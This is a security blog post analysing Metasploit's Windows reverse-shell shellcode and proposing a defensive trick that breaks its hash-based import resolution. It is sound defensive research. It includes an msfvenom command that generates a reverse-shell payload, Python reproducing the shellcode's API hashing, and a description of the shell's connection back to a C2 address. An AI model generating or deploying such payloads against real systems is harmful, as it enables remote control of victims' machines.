NVISO Labs

Anatomy and Disruption of Metasploit Shellcode

2 September 2021 at 16:04

In April 2021 we went through the anatomy of a Cobalt Strike stager and how some of its signature evasion techniques ended up being ineffective against detection technologies. In this blog post we will go one level deeper and focus on Metasploit, an often-used framework interoperable with Cobalt Strike.

Throughout this blog post we will cover the following topics:

  1. The shellcode’s import resolution – How Metasploit shellcode locates functions from other DLLs and how we can precompute these values to resolve any imports from other payload variants.
  2. The reverse-shell’s execution flow – How trivial a reverse shell actually is.
  3. Disruption of the Metasploit import resolution – A non-intrusive deception technique (no hooks involved) to have Metasploit notify the antivirus (AV) of its presence with high confidence.

For this analysis, we generated our own shellcode using Metasploit v6.0.30-dev. The malicious sample generated using the command below has the SHA256 hash 3792f355d1266459ed7c5615dac62c3a5aa63cf9e2c3c0f4ba036e6728763903 and is available on VirusTotal for readers willing to try the analysis themselves.

msfvenom -p windows/shell_reverse_tcp -a x86 > shellcode.vir

Throughout the analysis we have renamed functions, variables and offsets to reflect their role and improve clarity.

Initial Analysis

In this section we will outline the initial logic followed to determine the next steps of the analysis (import resolution and execution flow analysis).

While a typical executable contains one or more entry-points (exported functions, TLS-callbacks, …), shellcode can be seen as the most primitive code format where initial execution occurs from the first byte.

Analyzing the generated shellcode from the initial bytes outlines two operations:

  1. The first instruction at ① can be ignored from an analytical perspective. The cld operation clears the direction flag, ensuring string data is read forwards instead of backwards (e.g.: cmd vs dmc).
  2. The call operation at ② transfers execution to a function we named Main. This function contains the main logic of the shellcode.

Figure 1: Disassembled shellcode calling the Main function.

Within the Main function, we observe additional instructions of interest, such as the pop at ③ and the three calls at ④, ⑤ and ⑥ highlighted in the trimmed figure below. These calls target a yet unidentified function whose address is stored in the ebp register. To understand where this function is located, we will need to take a step back and understand how a call instruction operates.

Figure 2: Disassembly of the Main function.

A call instruction transfers execution to the target destination by performing two operations:

  1. It pushes the return address (the memory address of the instruction located after the call instruction) on the stack. This address can later be used by the ret instruction to return execution from the called function (callee) back to the calling function (caller).
  2. It transfers execution to the target destination (callee), as a jmp instruction would.

As such, the first pop instruction from the Main function at ③ stores the caller’s return address into the ebp register. This return address is then called as a function later on, among others at offsets 0x99, 0xA9 and 0xB8 (④, ⑤ and ⑥). This pattern, alongside the presence of a similar-looking push before each call, suggests the return address stored within ebp is the dynamic import resolution function.
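The call/pop pair can be replayed in a few lines of Python. This is only a sketch: the six prologue bytes below are an assumption on our side (a one-byte cld followed by a call rel32) rather than bytes copied from the figures, and the variable names are ours.

```python
import struct

# Assumed opening bytes: cld (FC) followed by call rel32 (E8 + 32-bit displacement)
prologue = bytes.fromhex("fc e8 82 00 00 00")

stack = []
call_offset = 1                                   # the call follows the 1-byte cld
displacement = struct.unpack_from("<i", prologue, call_offset + 1)[0]
return_address = call_offset + 5                  # a call rel32 is 5 bytes long
stack.append(return_address)                      # what the call pushes on the stack
main = return_address + displacement              # where execution continues

ebp = stack.pop()                                 # Main's first instruction: pop ebp
print(f"Main at {main:#x}, ebp = {ebp:#x}")
```

Under these assumptions, ebp ends up pointing at the byte located right after the initial call, which is where we expect the import resolution routine to start.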

Without diving into unnecessary depth, a “normal” executable (e.g.: Portable Executable on Windows) contains the necessary information so that, once loaded by the Operating System (OS) loader, the code can call imported routines such as those from the Windows API (e.g.: LoadLibraryA). To achieve this default behavior, the executable is expected to have a certain structure which the OS can interpret. As shellcode is a bare-bone version of the code (it has none of the expected structures), the OS loader can’t assist it in resolving these imported functions; even more so, the OS loader will fail to “execute” a shellcode file. To cope with this problem, shellcode commonly performs a “dynamic import resolution”.

One of the most common techniques to perform “dynamic import resolution” is hashing each available exported function and comparing it with the required import’s hash. As shellcode authors can’t always predict whether a specific DLL (e.g.: ws2_32.dll for Windows Sockets) and its exports are already loaded, it is not uncommon to observe shellcode loading DLLs by calling the LoadLibraryA function first (or one of its alternatives). Relying on LoadLibraryA (or alternatives) before calling other DLLs’ exports is a stable approach as these library-loading functions are part of kernel32.dll, one of the few DLLs which can be expected to be loaded into each process.

To confirm our above theory, we can search for all call instructions as can be seen in the following figure (e.g.: using IDA’s Text... option under the Search menu). Apart from the first call to the Main function, all instances refer to the ebp register. This observation, alongside well-known constants we will observe in the next section, supports our theory that the address stored in ebp holds a pointer to the function performing the dynamic import resolution.

Figure 3: All call instructions in the shellcode.

The abundance of calls towards the ebp register suggests it indeed holds a pointer to the import resolution function, which we now know is located right after the first call to Main.

Import Resolution Analysis

So far we noticed the instructions following the initial call to Main play a crucial role as what we expect to be the import resolution routine. Before we analyze the shellcode’s logic, let us analyze this resolution routine as it will ease the understanding of the remaining calls.

From Import Hash to Function

The code located immediately after the initial call to Main is where the import resolution starts. To resolve these imports, the routine first locates the list of modules loaded into memory as these contain their available exported functions.

To find these modules, an often leveraged shellcode technique is to interact with the Process Environment Block (shortened as PEB).

In computing the Process Environment Block (abbreviated PEB) is a data structure in the Windows NT operating system family. It is an opaque data structure that is used by the operating system internally, most of whose fields are not intended for use by anything other than the operating system. […] The PEB contains data structures that apply across a whole process, including global context, startup parameters, data structures for the program image loader, the program image base address, and synchronization objects used to provide mutual exclusion for process-wide data structures.

wikipedia.org

As can be observed in figure 4, to access the PEB, the shellcode accesses the Thread Environment Block (TEB) which is immediately accessible through a register (⑦). The TEB structure itself contains a pointer to the PEB (⑦). From the PEB, the shellcode can locate the PEB_LDR_DATA structure (⑧) which in turn contains a reference to multiple double-linked module lists. As can be observed at (⑨), the Metasploit shellcode leverages one of these double-linked lists (InMemoryOrderModuleList) to later iterate through the LDR_DATA_TABLE_ENTRY structures containing the loaded module information.

Once the first module is identified, the shellcode retrieves the module’s name (BaseDllName.Buffer) at ⑩ and the buffer’s maximum length (BaseDllName.MaximumLength) at ⑪, which is required as the buffer is not guaranteed to be NULL-terminated.

Figure 4: Disassembly of the initial module retrieval.

One point worth highlighting is that, as opposed to usual pointers (TEB.ProcessEnvironmentBlock, PEB.Ldr, …), a double-linked list points to the next item’s list entry. This means that instead of pointing to the structures’ start, a pointer from the list will target a non-zero offset. As such, while in the following figure the LDR_DATA_TABLE_ENTRY has the BaseDllName property at offset 0x2C, the offset from the list entry’s perspective will be 0x24 (0x2C-0x08). This can be observed in the above figure 4 where an offset of 8 has to be subtracted to access both of the BaseDllName properties at ⑩ and ⑪.

Figure 5: From TEB to BaseDllName.
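The offset arithmetic can be double-checked with a short Python sketch. The two structure offsets are the 32-bit values quoted above; the UNICODE_STRING field offsets are our assumption of its 32-bit layout (two USHORT fields followed by a pointer), and the helper name is ours.

```python
# 32-bit LDR_DATA_TABLE_ENTRY offsets, as quoted in this post
IN_MEMORY_ORDER_LINKS = 0x08
BASE_DLL_NAME = 0x2C

# Assumed 32-bit UNICODE_STRING layout: two USHORTs followed by a pointer
UNICODE_STRING_FIELDS = {"Length": 0x00, "MaximumLength": 0x02, "Buffer": 0x04}

def offset_from_list_entry(field):
    """Offset of a BaseDllName field as seen from the InMemoryOrderLinks entry."""
    return BASE_DLL_NAME + UNICODE_STRING_FIELDS[field] - IN_MEMORY_ORDER_LINKS

for field in UNICODE_STRING_FIELDS:
    print(f"BaseDllName.{field}: +{offset_from_list_entry(field):#04x}")
```

From the list entry’s perspective, this places MaximumLength at 0x26 and Buffer at 0x28.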

With the DLL name’s buffer and maximum length recovered, the shellcode proceeds to generate a hash. To do so, the shellcode performs a set of operations for each ASCII character within the maximum name length:

  1. If the character is lowercase, it is converted to uppercase. This operation is performed on the character’s ASCII representation: if the value is 0x61 or higher (a or higher), 0x20 gets subtracted to fall within the uppercase range.
  2. The generated hash (initially 0) is rotated right (ROR) by 13 bits (0x0D).
  3. The upper-cased character is added to the existing hash.

Figure 6: Schema depicting the hashing loops of KERNEL32.DLL’s first character (K).

With the repeated combination of rotations and additions on a fixed register size (32 bits in edi’s case), characters will ultimately start overlapping. These repeated and overlapping combinations make the operations non-reversible and hence produce a 32-bit hash/checksum for a given name.

One interesting observation is that while the BaseDllName in LDR_DATA_TABLE_ENTRY is Unicode-encoded (2 bytes per character), the code treats it as ASCII encoding (1 byte per character) by using lodsb (see ⑫).

Figure 7: Disassembly of the module’s name hashing routine.
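To visualize what a byte-wise read sees when walking a Unicode buffer, the following sketch (our own illustration, not part of the shellcode) prints the UTF-16-LE bytes of the module name.

```python
# Encode the module name the way it is stored in BaseDllName.Buffer
raw = "KERNEL32.DLL".encode("UTF-16-LE")

# Every character occupies two bytes; for ASCII-range characters the second is 0x00
print(raw.hex(" "))
# 4b 00 45 00 52 00 4e 00 45 00 4c 00 33 00 32 00 2e 00 44 00 4c 00 4c 00

# Reading byte by byte therefore alternates between a character and a NULL byte
characters = raw[0::2]
padding = raw[1::2]
print(characters, set(padding))
```

Each NULL byte still goes through the rotate-and-add step, which is why every character effectively gets rotated twice before the next one is added.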

The hash generation algorithm can be implemented in Python as shown in the snippet below. While we previously mentioned that the BaseDllName’s buffer was not required to be NULL-terminated per Microsoft documentation, extensive testing has shown that NULL-termination was always the case and could generally be assumed. This assumption is what makes the MaximumLength property a valid boundary, similarly to the Length property. The following snippet hence expects the data passed to get_hash to be a Python bytes object generated from a NULL-terminated Unicode string.

# Helper function for rotate-right on 32-bit architectures
def ror(number, bits):
    return ((number >> bits) | (number << (32 - bits))) & 0xffffffff

# Define hashing algorithm
def get_hash(data):
    # Initialize hash to 0
    result = 0
    # Loop each character
    for b in data:
        # Make character uppercase if needed
        if b >= ord('a'):
            b -= 0x20
        # Rotate DllHash right by 0x0D bits
        result = ror(result, 0x0D)
        # Add character to DllHash
        result = (result + b) & 0xffffffff
    return result

The above functions could be used as follows to compute the hash of KERNEL32.DLL.

# Define a NULL-terminated base DLL name
name = 'KERNEL32.DLL\0'
# Encode it as Unicode
encoded = name.encode('UTF-16-LE')
# Compute the hash
value = hex(get_hash(encoded))
# And print it ('0x92af16da')
print(value)

With the DLL name’s hash generated, the shellcode proceeds to identify all exported functions. To do so, the shellcode starts by retrieving the LDR_DATA_TABLE_ENTRY’s DllBase property (⑬) which points to the DLL’s in-memory address. From there, the IMAGE_EXPORT_DIRECTORY structure is identified by walking the Portable Executable’s structures (⑭ and ⑮) and adding the relative offsets to the DLL’s in-memory base address. This last structure contains the number of exported function names (⑰) as well as a table of pointers towards these (⑯).

Figure 8: Disassembly of the export retrieval.

The above operations can be schematized as follows, where dotted lines represent addresses computed from relative offsets increased by the DLL’s in-memory base address.

Figure 9: From LDR_DATA_TABLE_ENTRY to IMAGE_EXPORT_DIRECTORY.

Once the number of exported names and their pointers are identified, the shellcode enumerates the table in descending order. Specifically, the number of names is used as a decremented counter at ⑱. For each exported function’s name, and while none matches, the shellcode performs a hashing routine (hash_export_name at ⑲) similar to the one we observed previously, with the sole difference that character cases are preserved (hash_export_character).

The final hash is obtained by adding the recently computed function hash (ExportHash) to the previously obtained module hash (DllHash) at ⑳. This addition is then compared at ㉑ to the sought hash and, unless they match, the operation starts again for the next function.

Figure 10: Disassembly of export’s name hashing.
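As a worked example of this addition, the sketch below recomputes both hashes for kernel32.dll’s LoadLibraryA and sums them. The helper name ror13_hash and its uppercase switch are ours; we also assume the export name is hashed together with its NULL terminator.

```python
MASK = 0xFFFFFFFF

def ror(value, bits):
    """Rotate a 32-bit value right by the given number of bits."""
    return ((value >> bits) | (value << (32 - bits))) & MASK

def ror13_hash(data, uppercase=False):
    """Rotate-then-add hash over raw bytes, optionally upper-casing each byte."""
    result = 0
    for b in data:
        if uppercase and b >= ord('a'):
            b -= 0x20
        result = (ror(result, 0x0D) + b) & MASK
    return result

# DllHash: upper-cased, NULL-terminated Unicode module name
dll_hash = ror13_hash('KERNEL32.DLL\0'.encode('UTF-16-LE'), uppercase=True)
# ExportHash: case-preserved, NULL-terminated export name
export_hash = ror13_hash(b'LoadLibraryA\0')
# The value compared against the sought hash
combined = (dll_hash + export_hash) & MASK

print(hex(dll_hash), hex(export_hash), hex(combined))
# 0x92af16da 0x74776072 0x726774c
```

The combined value is the 726774Ch constant pushed before the first call ebp in figure 2.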

If none of the exported functions match, the routine retrieves the next module in the InMemoryOrderLinks double-linked list and performs the above operations again until a match is found.

Figure 11: Disassembly of the loop to the next module.

The walk through the double-linked list above can be schematized as in the following figure.

Figure 12: Walking the InMemoryOrderModuleList.

If a match is found, the shellcode will proceed to call the exported function. To retrieve its address from the previously identified IMAGE_EXPORT_DIRECTORY, the code will first need to map the function’s name to its ordinal (㉒), a sequential export number. Once the ordinal is recovered from the AddressOfNameOrdinals table, the address can be obtained by using the ordinal as an index in the AddressOfFunctions table (㉓).

Figure 13: Disassembly of the import “call”.
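The name-to-ordinal-to-address lookup can be sketched with three parallel tables. All names, ordinals and addresses below are made up for illustration; only the lookup order mirrors the export directory.

```python
# Toy export directory; every value here is hypothetical
dll_base = 0x10000000
address_of_names = ["Alpha", "Beta", "Gamma"]      # exported names
address_of_name_ordinals = [2, 0, 1]               # parallel to the names table
address_of_functions = [0x1100, 0x1200, 0x1300]    # relative addresses, indexed by ordinal

def resolve(name):
    """Map an exported name to its in-memory address."""
    name_index = address_of_names.index(name)       # position found while hashing names
    ordinal = address_of_name_ordinals[name_index]  # name index -> ordinal
    rva = address_of_functions[ordinal]             # ordinal -> relative address
    return dll_base + rva                           # relative address -> absolute address

print(hex(resolve("Alpha")))
# 0x10001300
```

The indirection through the ordinal table matters because the names table and the functions table are not guaranteed to share the same order.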

Finally, once the export’s address is recovered, the shellcode simulates the call behavior by ensuring the return address is first on the stack (removing the hash it was searching for, at ㉔), followed by all parameters as required by the default Win32 API __stdcall calling convention (㉕). The code then performs a jmp operation at ㉖ to transfer execution to the dynamically resolved import which, upon return, will resume from where the initial call ebp operation occurred.

Overall, the dynamic import resolution can be schematized as a nested loop. The main loop walks modules following the in-memory order (blue in the figure below) while, for each module, a second loop walks exported functions looking for a matching hash between desired import and available exports (red in the figure below).

Figure 14: The import resolution flow.
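The nested loop can be approximated as follows. This is a simplified model under our own assumptions: the module list, export names and addresses are hypothetical stand-ins for the in-memory structures, and the final LookupError has no equivalent in the shellcode.

```python
MASK = 0xFFFFFFFF

def ror13_hash(data, uppercase=False):
    """Rotate-right-by-13 then add, over raw bytes."""
    result = 0
    for b in data:
        if uppercase and b >= ord('a'):
            b -= 0x20
        result = ((result >> 13) | (result << 19)) & MASK
        result = (result + b) & MASK
    return result

# Hypothetical in-memory-order module list: (BaseDllName, {export name: fake address})
modules = [
    ("ntdll.dll", {"NtClose": 0x77001000}),
    ("KERNEL32.DLL", {"ExitProcess": 0x76001000, "LoadLibraryA": 0x76002000}),
]

def resolve(wanted):
    for base_dll_name, exports in modules:              # outer loop: modules
        buffer = (base_dll_name + "\0").encode("UTF-16-LE")
        dll_hash = ror13_hash(buffer, uppercase=True)
        for name in reversed(list(exports)):            # inner loop: exports, last to first
            export_hash = ror13_hash(name.encode("ASCII") + b"\0")
            if (dll_hash + export_hash) & MASK == wanted:
                return base_dll_name, name, exports[name]
    raise LookupError("no matching export")             # not present in the shellcode

print(resolve(0x0726774C))
```

Resolving 0x0726774C against this toy list walks past ntdll.dll and stops at KERNEL32.DLL’s LoadLibraryA entry.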

Building a Rainbow Table

Identifying which imports the shellcode relies on will provide us with further insight into the rest of its logic. Instead of dynamically analyzing the shellcode, and given that we have figured out the hashing algorithm above, we can build ourselves a rainbow table.

A rainbow table is a precomputed table for caching the output of cryptographic hash functions, usually for cracking password hashes.

wikipedia.org

The following Python snippet computes the “Metasploit” hashes for DLL exports located in the most common system locations.

import glob
import os
import pefile
import sys

size = 32
mask = ((2**size) - 1)

# Resolve 32- and 64-bit System32 paths
root = os.environ.get('SystemRoot')
if not root:
    raise Exception('Missing "SystemRoot" environment variable')

globs = [f"{root}\\System32\\*.dll", f"{root}\\SysWOW64\\*.dll"]

# Helper function for rotate-right
def ror(number, bits):
    return ((number >> (bits % size)) | (number << (size - (bits % size)))) & mask

# Define hashing algorithm
def get_hash(data):
    result = 0
    for b in data:
        result = ror(result, 0x0D)
        result = (result + b) & mask
    return result

# Helper function to uppercase data
def upper(data):
    return [(b if b < ord('a') else b - 0x20) for b in data]

# Print CSV header
print("File,Function,IDA,Yara")

# Loop through all DLLs
for g in globs:
    for file in glob.glob(g):
        # Compute the DllHash
        name = upper(os.path.basename(file).encode('UTF-16-LE') + b'\x00\x00')
        file_hash = get_hash(name)
        try:
            # Parse the DLL for exports
            pe = pefile.PE(file, fast_load=True)
            pe.parse_data_directories(directories = [pefile.DIRECTORY_ENTRY["IMAGE_DIRECTORY_ENTRY_EXPORT"]])
            if hasattr(pe, "DIRECTORY_ENTRY_EXPORT"):
                # Loop through exports
                for exp in pe.DIRECTORY_ENTRY_EXPORT.symbols:
                    if exp.name:
                        # Compute ExportHash
                        name = exp.name.decode('UTF-8')
                        exp_hash = get_hash(exp.name + b'\x00')
                        metasploit_hash = (file_hash + exp_hash) & mask
                        # Compute additional representations (to_bytes requires an integer length)
                        ida_view = metasploit_hash.to_bytes(size // 8, byteorder='big').hex().upper() + "h"
                        yara_view = metasploit_hash.to_bytes(size // 8, byteorder='little').hex(' ')
                        # Print CSV entry
                        print(f"\"{file}\",\"{name}\",\"{ida_view}\",\"{{{yara_view}}}\"")
        except pefile.PEFormatError:
            print(f"Unable to parse {file} as a valid PE, skipping.", file=sys.stderr)
            continue

As an example, the following PowerShell commands generate a rainbow table, then search it for the 726774Ch hash we first observed in figure 2. For everyone’s convenience, we have published our rainbow.csv version containing 239k hashes.

# Generate the rainbow table in CSV format
PS > .\rainbow.py | Out-File .\rainbow.csv -Encoding UTF8

# Search the rainbow table for a hash
PS > Get-Content .\rainbow.csv | Select-String 726774Ch
"C:\Windows\System32\kernel32.dll","LoadLibraryA","0726774Ch","{4c 77 26 07}"
"C:\Windows\SysWOW64\kernel32.dll","LoadLibraryA","0726774Ch","{4c 77 26 07}"

As can be observed above, the first import resolved and called by the shellcode is LoadLibraryA, exported by the 32- and 64-bit kernel32.dll.
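For repeated lookups, the CSV can also be indexed in Python. The sketch below is one possible approach rather than part of our tooling: it parses two rows copied from the output above through an in-memory file, whereas a real run would open rainbow.csv instead. The build_index helper is a name of our choosing.

```python
import csv
import io

# Two rows copied from the output above; a real run would open rainbow.csv instead
sample = io.StringIO(
    'File,Function,IDA,Yara\n'
    '"C:\\Windows\\System32\\kernel32.dll","LoadLibraryA","0726774Ch","{4c 77 26 07}"\n'
    '"C:\\Windows\\SysWOW64\\kernel32.dll","LoadLibraryA","0726774Ch","{4c 77 26 07}"\n'
)

def build_index(handle):
    """Map each numeric hash to the set of function names producing it."""
    index = {}
    for row in csv.DictReader(handle):
        value = int(row["IDA"].rstrip("h"), 16)   # "0726774Ch" -> 0x0726774C
        index.setdefault(value, set()).add(row["Function"])
    return index

index = build_index(sample)
print(index[0x0726774C])
# {'LoadLibraryA'}
```

Keying the index on the integer value avoids having to care about leading zeros or letter case when searching for constants copied from a disassembler.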

Execution Flow Analysis

With import resolution sorted out, understanding the remaining code becomes a lot more accessible. As we can see in figure 15, the shellcode starts by performing the following calls:

  1. LoadLibraryA at ㉗ to ensure the ws2_32 library is loaded. If not yet loaded, this will map the ws2_32.dll DLL in memory, enabling the shellcode to further resolve additional functions related to the Windows Sockets 2 technology.
  2. WSAStartup at ㉘ to initiate the usage of sockets within the shellcode’s process.
  3. WSASocketA at ㉙ to create a new socket. This one will be a stream-based (SOCK_STREAM) socket over IPv4 (AF_INET).

Figure 15: Disassembly of the socket initialization.

Once the socket is created, the shellcode proceeds to call the connect function at ㉝ with the sockaddr_in structure previously pushed on the stack (㉜). The sockaddr_in structure contains valuable information from an incident response perspective such as the address family (0x0200 being AF_INET, a.k.a. IPv4, in little endianness), the port (0x115c being the default 4444 Metasploit port in big endianness) as well as the C2 IPv4 address at ㉛ (0xc0a801ca being 192.168.1.202 in big endianness).
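For incident responders, decoding these fields can be scripted. The sketch below assumes the first eight bytes of the structure are laid out in memory as 02 00 11 5c c0 a8 01 ca, which is our reading of the three values quoted above.

```python
import socket
import struct

# Assumed in-memory layout of the first 8 bytes of the sockaddr_in structure
raw = bytes.fromhex("0200115cc0a801ca")

family = struct.unpack_from("<H", raw, 0)[0]   # address family, little-endian
port = struct.unpack_from(">H", raw, 2)[0]     # port, big-endian (network order)
address = socket.inet_ntoa(raw[4:8])           # IPv4 address, big-endian

print(family == socket.AF_INET, port, address)
# True 4444 192.168.1.202
```

The same three lines of unpacking apply to any other sample of this payload once the pushed values are extracted from the disassembly.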

If the connection fails, the shellcode retries up to 5 times (decrementing at ㉞ the counter defined at ㉚) after which it will abort execution using ExitProcess (㉟).

Figure 16: Disassembly of the socket connection.

If the connection succeeds, the shellcode will create a new cmd process and connect all of its Standard Error, Output and Input (㊱) to the established C2 socket. The process itself is started through a CreateProcessA call at ㊲.

Figure 17: Execution of the reverse-shell.

Finally, while the process is running, the shellcode performs the following operations:

  1. Wait indefinitely at ㊳ for the remote shell to terminate by calling WaitForSingleObject.
  2. Once terminated, identify the Windows operating system version at ㊴ using GetVersion and exit at ㊵ using either ExitProcess or RtlExitUserThread.

Figure 18: Termination of the shellcode.

Overall, the execution flow of Metasploit’s windows/shell_reverse_tcp shellcode can be schematized as follows:

Figure 19: Metasploit’s TCP reverse-shell execution flow.

Shellcode Disruption

With the execution flow analysis squared away, let’s see how we can turn the tables on the shellcode and disrupt it. From an attacker’s perspective, the shellcode itself is considered trusted while the environment it runs in is hostile. This section will build upon the assumption that we don’t know where shellcode is executing in memory and, as such, hooking/modifying the shellcode itself is not an acceptable solution.

In this section we will firstly focus on the theoretical aspects before covering a proof-of-concept implementation.

The Weaknesses

CWE-1288: Improper Validation of Consistency within Input

The product receives a complex input with multiple elements or fields that must be consistent with each other, but it does not validate or incorrectly validates that the input is actually consistent.

cwe.mitre.org

From the shellcode’s perspective only two external interactions provide a possible attack surface. The first and most obvious surface is the C2 channel where some security solutions can detect/impair either the communications protocol or the surrounding API calls. This attack surface however has the massive caveat that security solutions have to make the distinction between legitimate and malicious behaviors, possibly resulting in some medium/low-confidence detection.

A second less obvious attack surface is the import resolution itself which, from the shellcode’s perspective, relies on external process data. Within this import resolution routine, we observed how the shellcode relied on the BaseDllName property to generate a hash for each module.

Figure 20: The hashing routine retrieving both Buffer and MaximumLength to hash a module’s BaseDllName.

While the module’s exports were UTF-8 NULL-terminated strings, the BaseDllName property was a UNICODE_STRING structure. This structure contains multiple properties:

typedef struct _UNICODE_STRING {
  USHORT Length;
  USHORT MaximumLength;
  PWSTR  Buffer;
} UNICODE_STRING, *PUNICODE_STRING;

Length: The length, in bytes, of the string stored in Buffer.

MaximumLength: The length, in bytes, of Buffer.

Buffer: Pointer to a buffer used to contain a string of wide characters.

[…]

If the string is null-terminated, Length does not include the trailing null character.

The MaximumLength is used to indicate the length of Buffer so that if the string is passed to a conversion routine such as RtlAnsiStringToUnicodeString the returned string does not exceed the buffer size.

docs.microsoft.com

While not explicitly mentioned in the above documentation, we can implicitly understand that the buffer’s MaximumLength property is unrelated to the actual string’s Length property. The Unicode string does not need to consume the entire Buffer, nor is it guaranteed to be NULL-terminated. Theoretically, the Windows API should only consider the first Length bytes of the Buffer for comparison, ignoring any bytes between the Length and MaximumLength positions. Increasing a UNICODE_STRING’s buffer (Buffer and MaximumLength) should not impact functions relying on the stored string.

As the shellcode’s hashing routine relies on the buffer’s MaximumLength, similar strings within differently-sized buffers will generate different hashes. This flaw in the hashing routine can be leveraged to neutralize potential Metasploit shellcode. From a technical perspective, as security solutions already hook process creation and inject themselves, interfering with the hashing routine without knowledge of its existence or location can be achieved by increasing the BaseDllName buffer for modules required by Metasploit (e.g.: kernel32.dll).

This hash-input validation flaw is what we will leverage next as initial vector to cause a Denial of Service as well as an Execution Flow Hijack.
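The effect of the buffer size on the hash can be reproduced outside of the shellcode. In the sketch below, module_hash is our own stand-in for the module hashing routine, and the two buffers model the same string stored with different MaximumLength values (the 34-byte size is an arbitrary choice).

```python
def module_hash(buffer):
    """Hash every byte of the buffer, as the shellcode does up to MaximumLength."""
    result = 0
    for b in buffer:
        if b >= ord('a'):
            b -= 0x20
        result = ((result >> 13) | (result << 19)) & 0xFFFFFFFF
        result = (result + b) & 0xFFFFFFFF
    return result

name = "KERNEL32.DLL".encode("UTF-16-LE")   # Length == 24 bytes
tight = name + b"\x00" * 2                  # MaximumLength == 26
roomy = name + b"\x00" * 10                 # MaximumLength == 34, same string

print(hex(module_hash(tight)), hex(module_hash(roomy)))
```

Each additional NULL byte rotates the hash by another 13 bits, so the enlarged buffer no longer produces 0x92af16da even though the stored string is unchanged.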

CWE-823: Use of Out-of-range Pointer Offset

The program performs pointer arithmetic on a valid pointer, but it uses an offset that can point outside of the intended range of valid memory locations for the resulting pointer.

cwe.mitre.org

One observation we made earlier is how the shellcode loops over modules indefinitely until a matching export is found. As we found a flaw to alter hashes, let us analyze what happens if all hashes fail to match.

While walking the double-linked list could loop indefinitely, the shellcode will actually generate an “Access Violation” error once all modules have been checked. This exception is not generated explicitly by the shellcode but rather occurs as the code doesn’t verify the list’s boundaries. Given that for each item in the list the BaseDllName.Buffer pointer is loaded from offset 0x28, an exception will occur once we access the first non-LDR_DATA_TABLE_ENTRY item in the list. As shown in the figure below, this will be the case once the shellcode loops back to the first PEB_LDR_DATA structure, at which stage an out-of-bounds read will occur resulting in an invalid pointer being de-referenced.

Figure 21: An out-of-bounds read when walking the InMemoryOrderModuleList double-linked list.
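The missing boundary check can be modeled with a toy circular list. This is a deliberately simplified illustration: the module names are hypothetical, LIST_HEAD stands in for the list head stored in PEB_LDR_DATA, and the AccessViolation class merely represents the exception raised by the invalid dereference.

```python
from itertools import cycle

class AccessViolation(Exception):
    """Stand-in for the exception raised when an invalid pointer is dereferenced."""

LIST_HEAD = object()                                 # models the list head in PEB_LDR_DATA
modules = ["app.exe", "ntdll.dll", "kernel32.dll"]   # hypothetical load order

def walk(wanted):
    """Follow the circular list without ever checking for the list head."""
    # The list is circular: the last entry links back to the head
    for node in cycle(modules + [LIST_HEAD]):
        if node is LIST_HEAD:
            # The head is not an LDR_DATA_TABLE_ENTRY, so BaseDllName cannot be read
            raise AccessViolation("BaseDllName read from PEB_LDR_DATA")
        if node == wanted:
            return node

print(walk("kernel32.dll"))
```

Asking this model for a module which never matches ends with the AccessViolation being raised as soon as the walk reaches the list head.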

Although from a defensive perspective causing a Denial of Service is better than having Metasploit shellcode execute, let’s see how one could further exploit the above flaw to the defender’s advantage.

Abusing CWE-1288 to Hijack the Execution Flow

One module of interest is kernel32.dll which, as previously analyzed in the “Execution Flow Analysis” section, is the first required module in order to call the LoadLibraryA function. During the hashing routine, the kernel32.dll hash is computed to be 0x92af16da. By applying the above buffer-resize technique, we can ensure the shellcode loops over additional modules since the original hashes won’t match. From here, a security solution has a couple of options:

  • Our injected security solution’s DLL could be named kernel32.dll. While its hashes would match, having two modules named kernel32.dll might have unintended consequences on legitimate calls to LoadLibraryA.
  • Similarly, as we are already modifying buffers in LDR_DATA_TABLE_ENTRY structures, we could easily save the original values of the kernel32.dll buffer and assign them to our security solution’s injected module. While this would theoretically work, having a second buffer in memory called kernel32.dll isn’t a great idea as previously mentioned.
  • Alternatively, our security solution’s injected module could have a different name, as long as there is a hash-collision with the original hash. This technique won’t impact legitimate calls such as LoadLibraryA as these rely on value-based comparisons, as opposed to the shellcode’s hash-based comparisons.

We previously observed how the Metasploit shellcode performed hashing using additions and rotations on ASCII characters (1-byte). As a follow-up on figure 6, the following schema depicts the state of KERNEL32.DLL’s hash on the third loop, where the ASCII characters K and E overlap. As one might observe, the NULL character is a direct consequence of performing 1-byte operations on what initially is a Unicode string (2-byte).

Figure 22: The first and third ASCII characters overlapping.

To obtain a hash collision, we need to identify changes which we can perform on the initial KERNEL32.DLL string without altering the resulting hash. The following figure highlights how there is a 6-bit relationship between the first and third ASCII character. By subtracting the second bit of the first character, we can increment the eighth bit (2+6) of the third character without affecting the resulting hash.

Figure 23: A hash collision between the first and third ASCII characters.

While the above collision is not practical (the ASCII or Unicode character 0xC5 is not within the alphanumeric range), we can apply the same principle to identify acceptable relationships. The following Python snippet brute-forces the relationships among Unicode characters for the KERNEL32.DLL string assuming we don’t alter the string’s length.

name = "KERNEL32.DLL\0"
for i in range(len(name)):
    for j in range(len(name)):
        # Avoid duplicates
        if j <= i:
            continue
        # Compute right-shift/left-shift relationships
        # We shift twice by 13 bits due to Unicode being twice the size of ASCII.
        # We perform a modulo of 32 due to the registers being, in our case, 32 bits in size.
        relation = ((13*2*(j-i))%32)
        if relation > 16:
            relation -= 32
        # Get close relationships (0, 1, 2 or 3 bit-shifts)
        if -3 <= relation <= 3:
            print(f"Characters at index {i} and {j:2d} have a relationship of {relation} bits")
# "Characters at index 0 and  5 have a relationship of 2 bits"
# "Characters at index 0 and 11 have a relationship of -2 bits"
# "Characters at index 1 and  6 have a relationship of 2 bits"
# "Characters at index 1 and 12 have a relationship of -2 bits"
# "Characters at index 2 and  7 have a relationship of 2 bits"
# "Characters at index 3 and  8 have a relationship of 2 bits"
# "Characters at index 4 and  9 have a relationship of 2 bits"
# "Characters at index 5 and 10 have a relationship of 2 bits"
# "Characters at index 6 and 11 have a relationship of 2 bits"
# "Characters at index 7 and 12 have a relationship of 2 bits"

As observed above, multiple character pairs can be altered to cause a hash collision. As an example, there is a 2-bit left-shift relation between the characters at Unicode position 0 and 11.

Given a 2-bit left-shift is similar to a multiplication by 4, incrementing the Unicode character at position 0 by any value requires decrementing the character at position 11 by 4 times the same value to keep the Metasploit hash intact. The following Python commands highlight the different possible combinations between these two characters for KERNEL32.DLL.

# The original hash (0x92af16da)
print(hex(get_hash(upper('KERNEL32.DLL\0'.encode('UTF-16-LE')))))
# "0x92af16da"
# Decrementing 'K' by 3 requires adding 12 to 'L'
print(hex(get_hash(upper('HERNEL32.DLX\0'.encode('UTF-16-LE')))))
# "0x92af16da"
